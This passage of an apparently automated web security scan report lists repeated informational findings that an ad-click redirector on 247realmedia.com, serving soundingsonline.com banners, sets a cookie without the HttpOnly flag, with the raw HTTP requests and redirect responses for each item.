14.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

14.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/
...[SNIP]...

14.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

14.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172
...[SNIP]...

14.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:36:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.514. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:23:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

14.515. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

14.516. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i
...[SNIP]...

14.517. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
